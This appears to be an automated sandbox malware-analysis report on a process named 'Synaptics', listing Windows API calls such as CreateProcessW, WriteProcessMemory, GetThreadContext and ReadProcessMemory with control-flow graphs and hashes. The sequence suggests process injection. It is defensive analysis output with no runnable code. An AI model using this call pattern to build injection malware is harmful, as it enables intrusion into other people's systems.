                                                    • Instruction ID: bec4d830e4ed4530a1f28db505a8b945ea0aa729972fdf610d0144b44c0e6a0f
                                                    • Opcode Fuzzy Hash: 609cc9ae962354750ba7e5f38c7be84e0f6fdaf35d795092d0fe96c20be54b13
                                                    • Instruction Fuzzy Hash: A9B17271E402198FDBA0DFA4C884BDEBBB6BF84304F248569D419AB355DB70A885CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 963 6050d3c-6050db9 965 6050dc1-6050dc8 963->965 966 6050dbb-6050dbe 963->966 967 6050dd3-6050de9 965->967 968 6050dca-6050dd0 965->968 966->965 969 6050df4-6050e8f CreateProcessW 967->969 970 6050deb-6050df1 967->970 968->967 972 6050e91-6050e97 969->972 973 6050e98-6050f0c 969->973 970->969 972->973 981 6050f1e-6050f25 973->981 982 6050f0e-6050f14 973->982 983 6050f27-6050f36 981->983 984 6050f3c 981->984 982->981 983->984 986 6050f3d 984->986 986->986
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 06050E7C
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 382aedd9452d8430d5aa23dcde4f3ee2116a60f8f567b8dea9786bfbc2ef9cfc
                                                    • Instruction ID: 3fd8e849bb6592fb5ed4aa04274b0901b5551e9709424176ae53d035fbef82d7
                                                    • Opcode Fuzzy Hash: 382aedd9452d8430d5aa23dcde4f3ee2116a60f8f567b8dea9786bfbc2ef9cfc
                                                    • Instruction Fuzzy Hash: 91514671D012299FDF60CF99C984BDEBBB6FF49304F1084A9E949A7250D7709A88CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 987 6050d40-6050db9 988 6050dc1-6050dc8 987->988 989 6050dbb-6050dbe 987->989 990 6050dd3-6050de9 988->990 991 6050dca-6050dd0 988->991 989->988 992 6050df4-6050e8f CreateProcessW 990->992 993 6050deb-6050df1 990->993 991->990 995 6050e91-6050e97 992->995 996 6050e98-6050f0c 992->996 993->992 995->996 1004 6050f1e-6050f25 996->1004 1005 6050f0e-6050f14 996->1005 1006 6050f27-6050f36 1004->1006 1007 6050f3c 1004->1007 1005->1004 1006->1007 1009 6050f3d 1007->1009 1009->1009
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 06050E7C
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: a410042ce3c974af0514b23f7498548035c7cc36f9901c79380545a2b6a758be
                                                    • Instruction ID: 4bcea6794717318598caa5150c1f3cf8abf1cf9a56522e3e8675c5c6fc26c9b2
                                                    • Opcode Fuzzy Hash: a410042ce3c974af0514b23f7498548035c7cc36f9901c79380545a2b6a758be
                                                    • Instruction Fuzzy Hash: 69513571D012299FDF60CF99C984BDEBBB6BF49304F1184A9E909A7250D7709A88CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1010 15dfcac-15dfd1e 1011 15dfd29-15dfd30 1010->1011 1012 15dfd20-15dfd26 1010->1012 1013 15dfd3b-15dfd73 1011->1013 1014 15dfd32-15dfd38 1011->1014 1012->1011 1015 15dfd7b-15dfdda CreateWindowExW 1013->1015 1014->1013 1016 15dfddc-15dfde2 1015->1016 1017 15dfde3-15dfe1b 1015->1017 1016->1017 1021 15dfe1d-15dfe20 1017->1021 1022 15dfe28 1017->1022 1021->1022 1023 15dfe29 1022->1023 1023->1023
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 015DFDCA
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 7d77020b96262293fa25a4d3acf4d6aede72db35b12043cb055564c7deab8437
                                                    • Instruction ID: b88ffc1d2f1e3f5a24627aefaa4812f0212d1bb478ba2611859bf1c940931a61
                                                    • Opcode Fuzzy Hash: 7d77020b96262293fa25a4d3acf4d6aede72db35b12043cb055564c7deab8437
                                                    • Instruction Fuzzy Hash: 7951D0B5D003499FDB14CFA9C984ADDBFB5BF48314F24852AE419AB210D7749986CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1024 15dfcb8-15dfd1e 1025 15dfd29-15dfd30 1024->1025 1026 15dfd20-15dfd26 1024->1026 1027 15dfd3b-15dfdda CreateWindowExW 1025->1027 1028 15dfd32-15dfd38 1025->1028 1026->1025 1030 15dfddc-15dfde2 1027->1030 1031 15dfde3-15dfe1b 1027->1031 1028->1027 1030->1031 1035 15dfe1d-15dfe20 1031->1035 1036 15dfe28 1031->1036 1035->1036 1037 15dfe29 1036->1037 1037->1037
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 015DFDCA
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 34c834e060d8a155808dd645af45d1c66ff809bcd678293acff13695d2989e4c
                                                    • Instruction ID: 45da405354f7c96eeb5fa0724d1ddbb49ea5f2421751153dd27942c47a77594b
                                                    • Opcode Fuzzy Hash: 34c834e060d8a155808dd645af45d1c66ff809bcd678293acff13695d2989e4c
                                                    • Instruction Fuzzy Hash: 6341B0B1D003099FDB14CF9AD984ADEBFB5FF48314F24852AE419AB250D774A986CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1038 15d5345-15d5346 1039 15d5349-15d534a 1038->1039 1040 15d5348 1038->1040 1041 15d534d-15d5411 CreateActCtxA 1039->1041 1042 15d534c 1039->1042 1040->1039 1044 15d541a-15d5474 1041->1044 1045 15d5413-15d5419 1041->1045 1042->1041 1052 15d5476-15d5479 1044->1052 1053 15d5483-15d5487 1044->1053 1045->1044 1052->1053 1054 15d5489-15d5495 1053->1054 1055 15d5498 1053->1055 1054->1055 1057 15d5499 1055->1057 1057->1057
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 015D5401
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: fe71253065339b88a8fdc60a9bf918fd0ce5d099e5500c7b2b7fb7f4f11e4df6
                                                    • Instruction ID: 2129ac6a3e46ac85f53c358bd0b197de3acb2d82c397e61ed2fa7270f768f535
                                                    • Opcode Fuzzy Hash: fe71253065339b88a8fdc60a9bf918fd0ce5d099e5500c7b2b7fb7f4f11e4df6
                                                    • Instruction Fuzzy Hash: AC411571D00619CFDF24CFA9C984BDDBBB5BF49308F20886AD449AB251EB711946CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                     Basic blocks (node: address range -> successors):
                                                     • 1058: 15d3de4-15d5411 (CreateActCtxA) -> 1061, 1062
                                                     • 1061: 15d541a-15d5474 -> 1069, 1070
                                                     • 1062: 15d5413-15d5419 -> 1061
                                                     • 1069: 15d5476-15d5479 -> 1070
                                                     • 1070: 15d5483-15d5487 -> 1071, 1072
                                                     • 1071: 15d5489-15d5495 -> 1072
                                                     • 1072: 15d5498 -> 1074
                                                     • 1074: 15d5499 -> 1074 (self-loop)
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 015D5401
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 4f586b86660860051f88c4ad08b9494078e08b0b5f31ccc9befb0f6ec6b1f0a5
                                                    • Instruction ID: 1e9714ea40bc9bb12a65b706b48ef8567917e7020d94cce4f90726d4a4f17ed7
                                                    • Opcode Fuzzy Hash: 4f586b86660860051f88c4ad08b9494078e08b0b5f31ccc9befb0f6ec6b1f0a5
                                                    • Instruction Fuzzy Hash: 3C41F271D00618CFDF24CFA9C984BCEBBB5BF49308F208469D409AB251DB716946CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                     Basic blocks (node: address range -> successors):
                                                     • 1075: 15db873-15db875 -> 1076
                                                     • 1076: 15db878-15db90c (DuplicateHandle) -> 1077, 1078
                                                     • 1077: 15db90e-15db914 -> 1078
                                                     • 1078: 15db915-15db932 (exit)
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015DB8FF
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 49829d21ceb5f3f155496a51b9f206435a66e42ef153c7e2f833d96663d0b61f
                                                    • Instruction ID: 82bfb45b82cc242123c587f9252272daa8a30165d6dc34159aa0c208e485243c
                                                    • Opcode Fuzzy Hash: 49829d21ceb5f3f155496a51b9f206435a66e42ef153c7e2f833d96663d0b61f
                                                    • Instruction Fuzzy Hash: BF2116B5900218AFDB10CF99D984ADEBBF9FB49324F14842AE915A7310D374A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                     Basic blocks (node: address range -> successors):
                                                     • 1081: 15db878-15db90c (DuplicateHandle) -> 1082, 1083
                                                     • 1082: 15db90e-15db914 -> 1083
                                                     • 1083: 15db915-15db932 (exit)
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015DB8FF
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 180eedd309447cae3b148dc666a0c2106e467b224b5251085bb385dde8d652a3
                                                    • Instruction ID: 792f63a9c7ed15f8333bb0e27faa38c306b80605ed5077fe745e91ec34b7c223
                                                    • Opcode Fuzzy Hash: 180eedd309447cae3b148dc666a0c2106e467b224b5251085bb385dde8d652a3
                                                    • Instruction Fuzzy Hash: 7921F5B5900248AFDB10CF99D984ADEFBF9FB49324F14841AE955A7310D374A944CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                     Basic blocks (node: address range -> successors):
                                                     • 1086: 60510e2-605112e -> 1088, 1089
                                                     • 1088: 6051130-6051136 -> 1089
                                                     • 1089: 6051138-6051171 (WriteProcessMemory) -> 1090, 1091
                                                     • 1090: 6051173-6051179 -> 1091
                                                     • 1091: 605117a-605119b (exit)
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06051164
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: bb04afb245a94b6245573b61b1a69f6a518e66a99879212b75c6d6798d43c028
                                                    • Instruction ID: e4cfea5e7f3bb8eabcdc6b9b736f93cf7c257862e3f8242f5d5026aa9c720875
                                                    • Opcode Fuzzy Hash: bb04afb245a94b6245573b61b1a69f6a518e66a99879212b75c6d6798d43c028
                                                    • Instruction Fuzzy Hash: D02107B19002199FDB50CFA9D984BDEBBF4FB08320F448469E914A7240D378A544CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                     Basic blocks (node: address range -> successors):
                                                     • 1093: 60510e8-605112e -> 1094, 1095
                                                     • 1094: 6051130-6051136 -> 1095
                                                     • 1095: 6051138-6051171 (WriteProcessMemory) -> 1096, 1097
                                                     • 1096: 6051173-6051179 -> 1097
                                                     • 1097: 605117a-605119b (exit)
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06051164
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: edc883ec77d41fbc452d0ad94358aeae1d95b14ca2c7c3e6c48b5bc20fb617e7
                                                    • Instruction ID: b363c7939ac21e22e63dcc86774168066ecee228f223cafd06b307dce3392f2c
                                                    • Opcode Fuzzy Hash: edc883ec77d41fbc452d0ad94358aeae1d95b14ca2c7c3e6c48b5bc20fb617e7
                                                    • Instruction Fuzzy Hash: F12115B19003099FDB10CF99D984BDEBBF8FB08320F44846AE914A7240D378A644CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06051099
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 2ce53250a8ee7b5622e8ad3c1be909e926fe1ff6356bb16b1eadf2de92fa896b
                                                    • Instruction ID: 253557dfaf609f1351e94b33d0fcbd1ada85c3b1b1e42e4feb07ea84494f61db
                                                    • Opcode Fuzzy Hash: 2ce53250a8ee7b5622e8ad3c1be909e926fe1ff6356bb16b1eadf2de92fa896b
                                                    • Instruction Fuzzy Hash: 8B21E3B5C012599FDB10CF9AD984BDEFBF8FB08320F14852AE959A3200C378A544CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetThreadContext.KERNELBASE(?,00000000), ref: 06050FDB
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: ContextThread
                                                    • String ID:
                                                    • API String ID: 1591575202-0
                                                    • Opcode ID: 15c6796525157243243c775310aac573a33674895c893897eaf4dad1ee639bd2
                                                    • Instruction ID: d69ce3584fb20aa866aa122997286c7b16731e101f93abbf76c02c3ecb47247b
                                                    • Opcode Fuzzy Hash: 15c6796525157243243c775310aac573a33674895c893897eaf4dad1ee639bd2
                                                    • Instruction Fuzzy Hash: 971156B2C406098FDB50CF9AC884BDEFFF4EB88320F158029E819A3600D338A545CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015D9929,00000800,00000000,00000000), ref: 015D9B3A
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: e79270ddf6414b86d0b3e32f8d9f350d9e0c1b230c118fb4f0c273c47190110d
                                                    • Instruction ID: f1975977f02f1cde171cb89451fd2e830ae83b31652fdd6ce955379d321a6e92
                                                    • Opcode Fuzzy Hash: e79270ddf6414b86d0b3e32f8d9f350d9e0c1b230c118fb4f0c273c47190110d
                                                    • Instruction Fuzzy Hash: E51114B69042089FDB20CF9AC544BDEFBF4FB49324F14852AD95AB7200C374A545CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015D9929,00000800,00000000,00000000), ref: 015D9B3A
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: ef9214397b1977bd42ffd8de38bcf544da605e5464a93e9704cbda2e99a7472a
                                                    • Instruction ID: 8d469eef09ea989d3fa855d4cc37c4e782d9f66ed4e1643f377403a62116490d
                                                    • Opcode Fuzzy Hash: ef9214397b1977bd42ffd8de38bcf544da605e5464a93e9704cbda2e99a7472a
                                                    • Instruction Fuzzy Hash: 452103B69002089FDB24CF9AC584ADEFBF5BB48324F14852AD519AB200C375A545CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06051099
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: ac98568da178961ed69d68d2e5aa7545167385e620bb4599b7ab668dd35e0b9c
                                                    • Instruction ID: 9ef302e0ea77fd4dfacbee62798222a21251ea19ddb07c99575ea30a1fd100ce
                                                    • Opcode Fuzzy Hash: ac98568da178961ed69d68d2e5aa7545167385e620bb4599b7ab668dd35e0b9c
                                                    • Instruction Fuzzy Hash: 0A21C3B58012599FDB10CF9AD984BDEFBF8FB48320F10842AE959A3251C378A544CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetThreadContext.KERNELBASE(?,00000000), ref: 06050FDB
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: ContextThread
                                                    • String ID:
                                                    • API String ID: 1591575202-0
                                                    • Opcode ID: fc520a818fc39ec95ea006e125a649642a2790aeb75374296ea24ddb6fe91903
                                                    • Instruction ID: 93188d510a04e264784fe4e8820171f6c78cd02f92d1aba8ba8d4851c86f82c3
                                                    • Opcode Fuzzy Hash: fc520a818fc39ec95ea006e125a649642a2790aeb75374296ea24ddb6fe91903
                                                    • Instruction Fuzzy Hash: C41134B2D006098FDB10CF9AC984BDFFBF4EB88320F158029E859A3600D778A545CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 015D98AE
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 7f7c9a47c3103438224242bc690e0f498b92695919058bb97031b3f06effc33d
                                                    • Instruction ID: e025ba84eaf88017063c6ed38a652b38159d00bb4576b005e02b9a311bab4d45
                                                    • Opcode Fuzzy Hash: 7f7c9a47c3103438224242bc690e0f498b92695919058bb97031b3f06effc33d
                                                    • Instruction Fuzzy Hash: 60111FB5C00649DFDB20CF9AD484BDEFBF5AF88314F14852AC829AB600C375A546CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 06052188
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: c2cbb68904d37c3be8913fc865f613d8cbaa2e775c40bcbdd14ada5552555d1c
                                                    • Instruction ID: 12b504af8677343b5ae309853b10694818bac621a8c9e95b3ceeb01ff4715334
                                                    • Opcode Fuzzy Hash: c2cbb68904d37c3be8913fc865f613d8cbaa2e775c40bcbdd14ada5552555d1c
                                                    • Instruction Fuzzy Hash: 2F1155B28006099FCB10CF99C584BDEBBF4EF58320F14842AD959A7240C338A645CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 015D98AE
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: bd31f3dfd914fca0bf2b9bf93d0fb04e3a27529f34c99458bfd91caa0edee1e7
                                                    • Instruction ID: fbe4d28fe228178a3378a16160e089a6b7b4b500fe43cb81e8b4fee6442bda96
                                                    • Opcode Fuzzy Hash: bd31f3dfd914fca0bf2b9bf93d0fb04e3a27529f34c99458bfd91caa0edee1e7
                                                    • Instruction Fuzzy Hash: C51110B6C00649DFDB20CF9AC544BDEFBF4AF88628F14842AD519A7200C374A546CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 0605148D
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 1f44837116a293b7cafcf8218ba8bb33cb08e96791207c7666fb3ef1d094dd58
                                                    • Instruction ID: f739b78a2a7f8ad46faadd8a37411abe8a490457d475d07eed3096e3a5766048
                                                    • Opcode Fuzzy Hash: 1f44837116a293b7cafcf8218ba8bb33cb08e96791207c7666fb3ef1d094dd58
                                                    • Instruction Fuzzy Hash: 261103B58002099FDB50CF9AD985BDEFFF8EB48324F148419E955A3600C375A584CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 06052188
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: ff8bc8dd2209920a22d40dc7eb5b91aa26f58e65bbb6d6d8880d23cfa0b40caf
                                                    • Instruction ID: f3fbe4bcab4416ba03424a67119b9268b7025e0d60e40fb6bc48ca191cadcbe9
                                                    • Opcode Fuzzy Hash: ff8bc8dd2209920a22d40dc7eb5b91aa26f58e65bbb6d6d8880d23cfa0b40caf
                                                    • Instruction Fuzzy Hash: E61133B28006099FCB10CF99C588BDFBBF4EF58320F14842AD959A7240C738A685CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 015DFF5D
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: d75d503cb883b15c0d093152edf8f2f402fbdca2a7cd64ea5b07366a6ab130af
                                                    • Instruction ID: ed822d5cc54e62731722a6add3a971afb3d2a416061cda368e1cb4915298aea0
                                                    • Opcode Fuzzy Hash: d75d503cb883b15c0d093152edf8f2f402fbdca2a7cd64ea5b07366a6ab130af
                                                    • Instruction Fuzzy Hash: FE1133B58002099FDB20CF99D585BDEFBF8FB48320F14885AD969A7340C374AA45CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 015DFF5D
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: 6cbea0b1e0f2f10fc9ba72c3d8cc88fdb20249cef688f56a106558b241e81712
                                                    • Instruction ID: 3127e0370fc7a1e69f714fd4560f89305bd2716de2bf2a8f14a93931526c26ff
                                                    • Opcode Fuzzy Hash: 6cbea0b1e0f2f10fc9ba72c3d8cc88fdb20249cef688f56a106558b241e81712
                                                    • Instruction Fuzzy Hash: 811127B58002099FDB20CF99D584BDEFBF8FB49324F10845AD959A7340C374A945CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 0605148D
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 9b709b7cd2d166d06a4aed58fc169151b35032704a511dd2507811a9e2aa8383
                                                    • Instruction ID: 59621225ebaac0fa12d5aa209d32e5c44a4b76a4694b9633ce651d91b2360666
                                                    • Opcode Fuzzy Hash: 9b709b7cd2d166d06a4aed58fc169151b35032704a511dd2507811a9e2aa8383
                                                    • Instruction Fuzzy Hash: 9D11D3B58002499FDB50CF99D984BDEBBF8EB48324F148459D955A7600C375A544CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06051164
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
